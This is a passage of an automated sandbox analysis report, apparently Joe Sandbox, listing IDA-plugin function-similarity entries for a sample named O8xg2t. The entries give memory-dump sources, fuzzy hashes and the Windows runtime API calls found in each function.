                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: _set_statfp
                                  • String ID:
                                  • API String ID: 1156100317-0
                                  • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction ID: 3e4d024bc979473759fe9c4a1ca97b449436c695de90e4f408d8494207eeacd0
                                  • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction Fuzzy Hash: 501108FAF09A0701F3541934E1253BF13206F9C3F0F9462B8E56FA66DA8E2CAC404920
                                  APIs
                                  • FlsGetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA96A3
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA96C2
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA96EA
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA96FB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC1BA766F,?,?,00000000,00007FFBC1BA790A,?,?,?,?,?,00007FFBC1BA7896), ref: 00007FFBC1BA970C
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction ID: db85ac5fc44e1bbb4cd957f3d16b5cc295d8927a424341db9fb2829643ff1d96
                                  • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction Fuzzy Hash: B8114FA8F0E24245FB58AF36E66127B23415F447F0F546335E83D666D6EE2CA4419E00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction ID: 3653edb162c491dca73d7d181adf929168c43c37faaca29f18faf3ac8d838862
                                  • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction Fuzzy Hash: 1E11E8D8F0E2074AFB68AF36D56227B13814F44375F546734D97E6A6D2EE2CB4429E00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                  • String ID:
                                  • API String ID: 1445889803-0
                                  • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                  • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                  • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                  • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction ID: 25dbf5edc7b93ad68bbfc18731a3c428cab1ea5acfffb0b706ffa6cf6a7fafa4
                                  • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction Fuzzy Hash: 1C918EB7B097858AE7108F78E5402AE7BA0FB44788F14512AEA8D67B55DF38D195CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                  • Instruction ID: fa01c1e7ecf82f8e7eb828a2fc38ebe7955345db14304b9fb93133d8f67ba6a3
                                  • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                  • Instruction Fuzzy Hash: 7251A17AB1A6428ADB14CF36D444A7E7392EF44B88F50D131DA4A937A4EF7DE841CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction ID: 6846908611befe4873db05ab6318fdeec8bc483c5742c95423e859928fcc1447
                                  • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction Fuzzy Hash: 3D51A2BAB09382CAEB648F31D69436A77A0EB44B85F546135DA4DA3791CF3CE551CF00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction ID: dd92b4207dc63abf28b2d838a8cb2cdab9450f2a4350fe2f204256ae6692a9f2
                                  • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction Fuzzy Hash: 7E618EB6A09BC5C5D7208F25E5403AEB7A0FB85794F045225EB9D27B59DF7CE290CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressHandleLoadModuleProc
                                  • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                  • API String ID: 3055805555-3733552308
                                  • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                  • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Process$CurrentSizeWorking
                                  • String ID: Shrinking process size
                                  • API String ID: 2122760700-652428428
                                  • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                  • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$Leave
                                  • String ID:
                                  • API String ID: 2801635615-0
                                  • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                  • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction ID: 4e3fd369b3f1011aba923d282a777336041f402bde5e1928b1d60c93afa1ce2a
                                  • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction Fuzzy Hash: 95D1F4B6F0AA8189E711CF79D4402ED37B1FB44798B049236EE5DA7B99DE38D406CB40
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00007FFBC1BAED07), ref: 00007FFBC1BAEE38
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00007FFBC1BAED07), ref: 00007FFBC1BAEEC3
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ConsoleErrorLastMode
                                  • String ID:
                                  • API String ID: 953036326-0
                                  • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction ID: b63cdcca0b528a2c69f258db642e3249f3479be6d01f53e12a9b9599206772fb
                                  • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction Fuzzy Hash: F791D4BAB1965185F7609F35D4802BE3BA4EB44B88F146139EE4E77A94CF38D446CB00
                                  APIs
                                  • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                  • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                  • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                  • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                  • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                  • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction ID: eddde16b781e5edbba344afe7e3026351619f86da83e98448b181cda0acbc829
                                  • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction Fuzzy Hash: 4B114C6AB14F058AEB008F70E8542A933A4F71C758F441E31DA2D56BA4DF7CE154C740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateEvent$CriticalInitializeSection
                                  • String ID:
                                  • API String ID: 926662266-0
                                  • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                  • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: __except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 1467352782-3733052814
                                  • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction ID: 6642192f41d3d2a69cf5e3b4ea4c838f345dec79f91c0b90912629af087912cb
                                  • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction Fuzzy Hash: 3E7171BA60A681CAD7608F35D5447BE7BA0FB04B84F14A135EF8C67A89DB3CD651CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateFrameInfo__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2558813199-1018135373
                                  • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction ID: 4a8ba56a974b7540ace2c153f86d9eab939451e902eb6460317b1a28f8ceaa5c
                                  • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction Fuzzy Hash: 6C5151BB71AB4196D720AF25E04026E77A4FB89B90F146134DB8D27B65CF38E451CF40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction ID: a5724ef8d392252292b8510e8a658f931ad4aca65e1946702f272b06aabfadf4
                                  • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction Fuzzy Hash: A841D566B19A4181DB20DF35E4443AA77A1FB88794F805031EE4E97B94DF3CD441CB50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                   • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmp
                                   • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileHandleType
                                  • String ID: 0eO
                                  • API String ID: 3000768030-633601889
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                   • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                   • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID: csm
                                  • API String ID: 3997070919-1018135373
                                  APIs
